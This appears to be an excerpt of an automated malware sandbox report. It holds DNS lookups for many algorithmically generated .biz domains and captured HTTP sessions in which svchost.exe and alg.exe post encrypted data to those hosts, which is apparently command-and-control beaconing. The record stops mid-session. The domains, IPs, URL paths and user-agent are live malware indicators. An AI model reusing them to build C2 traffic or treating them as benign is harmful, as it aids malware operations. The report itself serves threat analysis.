                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:52.487108946 CEST1.1.1.1192.168.2.40x34a1No error (0)qncdaagct.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.279155970 CEST1.1.1.1192.168.2.40xa3acNo error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:53.279191017 CEST1.1.1.1192.168.2.40xa3acNo error (0)bghjpy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.017364025 CEST1.1.1.1192.168.2.40xb89No error (0)shpwbsrw.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.429665089 CEST1.1.1.1192.168.2.40x314dNo error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:54.429682016 CEST1.1.1.1192.168.2.40x314dNo error (0)damcprvgv.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.267066956 CEST1.1.1.1192.168.2.40xdbb3No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.267091036 CEST1.1.1.1192.168.2.40xdbb3No error (0)ocsvqjg.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.396401882 CEST1.1.1.1192.168.2.40xf138No error (0)cjvgcl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:55.902245045 CEST1.1.1.1192.168.2.40x8b9fNo error (0)neazudmrq.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:56.488837957 CEST1.1.1.1192.168.2.40xfae6No error (0)pgfsvwx.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:57.211448908 CEST1.1.1.1192.168.2.40xaa7dNo error (0)ywffr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.294387102 CEST1.1.1.1192.168.2.40xfa6eNo error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:58.294405937 CEST1.1.1.1192.168.2.40xfa6eNo error (0)ecxbwt.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:59.170397043 CEST1.1.1.1192.168.2.40x77c9No error (0)pectx.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.157155037 CEST1.1.1.1192.168.2.40x1d49No error (0)zyiexezl.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.698559999 CEST1.1.1.1192.168.2.40x3baaNo error (0)aatcwo.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:00.754949093 CEST1.1.1.1192.168.2.40x2185No error (0)banwyw.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:01.340930939 CEST1.1.1.1192.168.2.40xe756No error (0)wxgzshna.biz72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.449840069 CEST1.1.1.1192.168.2.40x2a95No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.451421976 CEST1.1.1.1192.168.2.40x2a95No error (0)kcyvxytog.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.582195044 CEST1.1.1.1192.168.2.40x6ebcNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.582214117 CEST1.1.1.1192.168.2.40x6ebcNo error (0)zrlssa.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:02.958690882 CEST1.1.1.1192.168.2.40x70abNo error (0)nwdnxrd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.189076900 CEST1.1.1.1192.168.2.40xd355No error (0)jlqltsjvh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:03.710712910 CEST1.1.1.1192.168.2.40x29bdNo error (0)ereplfx.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.404294968 CEST1.1.1.1192.168.2.40x5bf8No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.404335976 CEST1.1.1.1192.168.2.40x5bf8No error (0)ptrim.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:04.679826975 CEST1.1.1.1192.168.2.40x8c21No error (0)xyrgy.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.423347950 CEST1.1.1.1192.168.2.40xb75aNo error (0)htwqzczce.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.423347950 CEST1.1.1.1192.168.2.40xb75aNo error (0)htwqzczce.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:05.756195068 CEST1.1.1.1192.168.2.40xe4e8No error (0)znwbniskf.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:06.459042072 CEST1.1.1.1192.168.2.40x68f8No error (0)kvbjaur.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.365204096 CEST1.1.1.1192.168.2.40x479bNo error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.380871058 CEST1.1.1.1192.168.2.40x8459No error (0)uphca.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:07.844377995 CEST1.1.1.1192.168.2.40xe6d0No error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.023073912 CEST1.1.1.1192.168.2.40xbe6aNo error (0)fjumtfnz.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:08.324904919 CEST1.1.1.1192.168.2.40x775dNo error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.300026894 CEST1.1.1.1192.168.2.40x3213No error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.300050974 CEST1.1.1.1192.168.2.40x3213No error (0)hlzfuyy.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.851672888 CEST1.1.1.1192.168.2.40xd597No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:09.851721048 CEST1.1.1.1192.168.2.40xd597No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.209791899 CEST1.1.1.1192.168.2.40x854fNo error (0)rffxu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.419677973 CEST1.1.1.1192.168.2.40x35aNo error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.419797897 CEST1.1.1.1192.168.2.40x35aNo error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:10.919450998 CEST1.1.1.1192.168.2.40xb5feNo error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.106113911 CEST1.1.1.1192.168.2.40x131eNo error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.617567062 CEST1.1.1.1192.168.2.40x8796No error (0)dyjdrp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.537683010 CEST1.1.1.1192.168.2.40x511No error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.752326965 CEST1.1.1.1192.168.2.40xe72dNo error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.193948984 CEST1.1.1.1192.168.2.40xb77bNo error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.966646910 CEST1.1.1.1192.168.2.40x3156No error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.328537941 CEST1.1.1.1192.168.2.40x905cNo error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.100379944 CEST1.1.1.1192.168.2.40x132No error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.021342993 CEST1.1.1.1192.168.2.40xe61eNo error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.601727009 CEST1.1.1.1192.168.2.40x2bf2No error (0)vnvbt.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.512458086 CEST1.1.1.1192.168.2.40xed25No error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.032753944 CEST1.1.1.1192.168.2.40xc7d0No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.807996988 CEST1.1.1.1192.168.2.40x8d5No error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.308206081 CEST1.1.1.1192.168.2.40x4a03No error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.171786070 CEST1.1.1.1192.168.2.40x7011No error (0)giliplg.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.718128920 CEST1.1.1.1192.168.2.40xfaabNo error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.802808046 CEST1.1.1.1192.168.2.40xf01fNo error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.384229898 CEST1.1.1.1192.168.2.40xc8e1No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.384305000 CEST1.1.1.1192.168.2.40xc8e1No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.744889975 CEST1.1.1.1192.168.2.40x575fNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.412753105 CEST1.1.1.1192.168.2.40xf935No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.412753105 CEST1.1.1.1192.168.2.40xf935No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.419359922 CEST1.1.1.1192.168.2.40xe0a9Name error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.429784060 CEST1.1.1.1192.168.2.40xa782No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.785809040 CEST1.1.1.1192.168.2.40x5f1Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.795036077 CEST1.1.1.1192.168.2.40x84f6Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.806251049 CEST1.1.1.1192.168.2.40x3f82No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.420854092 CEST1.1.1.1192.168.2.40x6bbfNo error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:23.113141060 CEST1.1.1.1192.168.2.40xc7c1No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:35.811852932 CEST1.1.1.1192.168.2.40x5d7fNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:37.154448032 CEST1.1.1.1192.168.2.40xe42fNo error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.761208057 CEST1.1.1.1192.168.2.40xac7fNo error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.341305971 CEST1.1.1.1192.168.2.40x79daNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.707365036 CEST1.1.1.1192.168.2.40x63c5No error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.707365036 CEST1.1.1.1192.168.2.40x63c5No error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.911767960 CEST1.1.1.1192.168.2.40xac14No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.912312984 CEST1.1.1.1192.168.2.40xac14No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.683409929 CEST1.1.1.1192.168.2.40x1cedNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.198812962 CEST1.1.1.1192.168.2.40x6d2bNo error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.838720083 CEST1.1.1.1192.168.2.40xd64No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.196471930 CEST1.1.1.1192.168.2.40x3a83No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.895880938 CEST1.1.1.1192.168.2.40xdf0cNo error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.642970085 CEST1.1.1.1192.168.2.40xafd6No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.482764006 CEST1.1.1.1192.168.2.40xc8d6No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.482780933 CEST1.1.1.1192.168.2.40xc8d6No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.987709999 CEST1.1.1.1192.168.2.40xc76dNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.987709999 CEST1.1.1.1192.168.2.40xc76dNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.054546118 CEST1.1.1.1192.168.2.40x91fcNo error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.156081915 CEST1.1.1.1192.168.2.40xe9aNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:52.185369015 CEST1.1.1.1192.168.2.40x74cdNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:53.266381025 CEST1.1.1.1192.168.2.40x5f0No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:54.075490952 CEST1.1.1.1192.168.2.40x8482No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • shpwbsrw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • cjvgcl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • neazudmrq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • mjheo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • wluwplyh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • zgapiej.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • jifai.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • xnxvnn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ihcnogskt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • kkqypycm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • uevrpr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • sewlqwcd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • dyjdrp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • napws.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • qvuhsaqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • apzzls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • tltxn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • vgypotwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              • giliplg.biz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 54.244.188.177 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:27:56.446223974 CEST | 360 | OUT | POST /bvjounbjkagqnta HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 786
Oct 8, 2024 15:27:56.446223974 CEST | 786 | OUT | Data Raw: ae 46 06 5e fe d4 1d 0f 06 03 00 00 11 3b 4e f2 93 fa 23 1c 0f ff 27 56 c5 e9 a4 8c b5 d0 1a 0d b8 84 cd b7 48 c6 0e 5e b6 7b ab 84 ef f8 bb 80 b1 c1 69 58 c5 59 91 df 9b 56 5e 4c 3a 06 bc 65 86 21 ec 22 eb 4e f9 21 41 90 b7 d9 ba d2 0c c9 a4 9f
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: F^;N#'VH^{iXYV^L:e!"N!AXr<;-TzO<aB>P($Oxa&%"*>sSCxIwHu*rn!WN*?i[(}DV6|20Sf1v}Wn
Oct 8, 2024 15:27:57.180274963 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 13:27:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4c67fe4f5f90402ab5e6aebac2a0db0c|8.46.123.33|1728394077|1728394077|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 18.141.10.107 | 80 | 4476 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:27:57.244077921 CEST | 357 | OUT | POST /rsmfnaxurgxpde HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
Oct 8, 2024 15:27:57.244093895 CEST | 786 | OUT | (request body)
Oct 8, 2024 15:27:58.605746984 CEST | 409 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:27:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c4a12f7ffbf31ea9f1ae735db3b37b0c|8.46.123.33|1728394078|1728394078|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49734 | 54.244.188.177 | 80 | 2912 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:27:58.674415112 CEST | 357 | OUT | POST /dqlfliuucamv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:27:58.674439907 CEST | 778 | OUT | (request body)
Oct 8, 2024 15:27:58.910633087 CEST | 1135 | OUT | POST /dqlfliuucamv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
Oct 8, 2024 15:27:59.223054886 CEST | 1135 | OUT | POST /dqlfliuucamv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
